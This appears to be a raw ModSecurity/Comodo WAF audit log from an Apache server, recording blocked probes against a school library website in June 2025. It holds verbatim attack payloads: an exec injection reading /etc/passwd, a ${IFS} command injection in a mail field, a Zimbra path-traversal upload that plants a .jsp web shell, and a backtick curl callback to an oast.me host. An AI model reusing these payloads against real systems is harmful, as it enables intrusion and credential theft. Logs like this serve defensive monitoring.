Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed2f7043-Z-- --b3d18634-A-- [04/Jun/2025:15:52:02 +0700] aEAJMjNXNn6zAsHj7JCanAAAAEA 103.236.140.4 47588 103.236.140.4 8181 --b3d18634-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --b3d18634-C-- Äxexamplecom --b3d18634-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d18634-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027122195086 3939 (- - -) Stopwatch2: 1749027122195086 3939; combined=2554, p1=549, p2=1902, p3=32, p4=35, p5=36, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d18634-Z-- --e6e09e67-A-- [04/Jun/2025:15:52:03 +0700] aEAJM1_DvM40jZomoksE-QAAAAM 103.236.140.4 47614 103.236.140.4 8181 --e6e09e67-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --e6e09e67-C-- “&examplecom --e6e09e67-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e09e67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027123242851 4172 (- - -) Stopwatch2: 1749027123242851 4172; combined=3114, p1=661, p2=2348, p3=35, p4=40, p5=29, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e09e67-Z-- --d0624966-A-- [04/Jun/2025:15:52:03 +0700] aEAJM1_DvM40jZomoksE_AAAABI 103.236.140.4 47632 103.236.140.4 8181 --d0624966-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d0624966-C-- ÂÄexamplecom --d0624966-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0624966-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027123842523 3857 (- - -) Stopwatch2: 1749027123842523 3857; combined=2501, p1=526, p2=1880, p3=31, p4=36, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0624966-Z-- --a0494d3b-A-- [04/Jun/2025:15:52:04 +0700] aEAJNDNXNn6zAsHj7JCanwAAAFA 103.236.140.4 47654 103.236.140.4 8181 --a0494d3b-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a0494d3b-C-- ¨›examplecom --a0494d3b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0494d3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027124446245 3089 (- - -) Stopwatch2: 1749027124446245 3089; combined=1996, p1=451, p2=1477, p3=21, p4=23, p5=24, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0494d3b-Z-- --d4bb4c29-A-- [04/Jun/2025:15:52:05 +0700] aEAJNTNXNn6zAsHj7JCaogAAAEw 103.236.140.4 47680 103.236.140.4 8181 --d4bb4c29-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d4bb4c29-C-- ¿'examplecom --d4bb4c29-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4bb4c29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027125444297 3049 (- - -) Stopwatch2: 1749027125444297 3049; combined=1982, p1=435, p2=1477, p3=21, p4=24, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4bb4c29-Z-- --9391cb33-A-- [04/Jun/2025:15:52:06 +0700] aEAJNjNXNn6zAsHj7JCapQAAAFY 103.236.140.4 47706 103.236.140.4 8181 --9391cb33-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9391cb33-C-- Pexamplecom --9391cb33-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --9391cb33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027126440198 4184 (- - -) Stopwatch2: 1749027126440198 4184; combined=2541, p1=531, p2=1906, p3=37, p4=38, p5=28, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9391cb33-Z-- --6b77b15c-A-- [04/Jun/2025:15:52:07 +0700] aEAJNzNXNn6zAsHj7JCaqAAAAFU 103.236.140.4 47748 103.236.140.4 8181 --6b77b15c-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --6b77b15c-C-- ¹›examplecom --6b77b15c-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --6b77b15c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027127430329 4810 (- - -) Stopwatch2: 1749027127430329 4810; combined=2950, p1=602, p2=2226, p3=44, p4=42, p5=35, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b77b15c-Z-- --708bf90d-A-- [04/Jun/2025:15:58:02 +0700] aEAKml_DvM40jZomoksGGQAAAAY 103.236.140.4 55774 103.236.140.4 8181 --708bf90d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --708bf90d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --708bf90d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749027482360629 601 (- - -) Stopwatch2: 1749027482360629 601; combined=223, p1=189, p2=0, p3=0, p4=0, p5=33, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708bf90d-Z-- --eb741c66-A-- [04/Jun/2025:16:59:32 +0700] aEAZBF_DvM40jZomoksXiQAAABA 103.236.140.4 46896 103.236.140.4 8181 --eb741c66-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 39 User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 162529246 --eb741c66-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --eb741c66-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb741c66-E-- --eb741c66-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749031172689024 4246 (- - -) Stopwatch2: 1749031172689024 4246; combined=2492, p1=486, p2=1972, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb741c66-Z-- --14f37566-A-- [04/Jun/2025:17:09:13 +0700] aEAbSV_DvM40jZomoksarAAAABQ 103.236.140.4 32986 103.236.140.4 8181 --14f37566-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --14f37566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14f37566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749031753034893 687 (- - -) Stopwatch2: 1749031753034893 687; combined=300, p1=269, p2=0, p3=0, p4=0, p5=31, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14f37566-Z-- --a09ac950-A-- [04/Jun/2025:17:18:03 +0700] aEAdWzNXNn6zAsHj7JC02gAAAFA 103.236.140.4 44992 103.236.140.4 8181 --a09ac950-B-- GET /webadmin/pkg?command= HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/102.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 173575938 --a09ac950-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a09ac950-E-- --a09ac950-H-- Message: Access denied with code 403 (phase 2). Matched phrase "document.cookie" at ARGS:command. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "56"] [id "212340"] [rev "5"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: document.cookie found within ARGS:command: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749032283496920 2364 (- - -) Stopwatch2: 1749032283496920 2364; combined=996, p1=384, p2=570, p3=0, p4=0, p5=42, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a09ac950-Z-- --4d54df6c-A-- [04/Jun/2025:17:38:19 +0700] aEAiG9hPZJx8OfNaLCrrmAAAANY 103.236.140.4 41914 103.236.140.4 8181 --4d54df6c-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/117.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173640298 --4d54df6c-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --4d54df6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d54df6c-E-- --4d54df6c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749033499388697 2086 (- - -) Stopwatch2: 1749033499388697 2086; combined=645, p1=425, p2=175, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d54df6c-Z-- --aa26977a-A-- [04/Jun/2025:17:39:32 +0700] aEAiZNhPZJx8OfNaLCrr0wAAANA 103.236.140.4 43292 103.236.140.4 8181 --aa26977a-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173580333 --aa26977a-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --7392593c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7392593c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749037523517222 6419 (- - -) Stopwatch2: 1749037523517222 6419; combined=4613, p1=486, p2=4088, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7392593c-Z-- --5731b077-A-- [04/Jun/2025:18:45:23 +0700] aEAx0zNXNn6zAsHj7JDKpwAAAEY 103.236.140.4 54664 103.236.140.4 8181 --5731b077-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 716 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173624295 --5731b077-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ 
Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --5731b077-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5731b077-E-- --5731b077-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749037523523505 4999 (- - -) Stopwatch2: 1749037523523505 4999; combined=3385, p1=373, p2=2977, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5731b077-Z-- --b5b1e465-A-- [04/Jun/2025:18:45:23 +0700] aEAx05LmnxTwEPX7IuZ1zwAAAIY 103.236.140.4 54678 103.236.140.4 8181 --b5b1e465-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 170 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171343232 --b5b1e465-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0us2vpgpeonc6qdbef0n6hdbb6q3c7s7.oast.me`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --b5b1e465-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5b1e465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749037523524301 4759 (- - -) Stopwatch2: 1749037523524301 4759; combined=3151, p1=636, p2=2353, p3=62, p4=53, p5=47, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
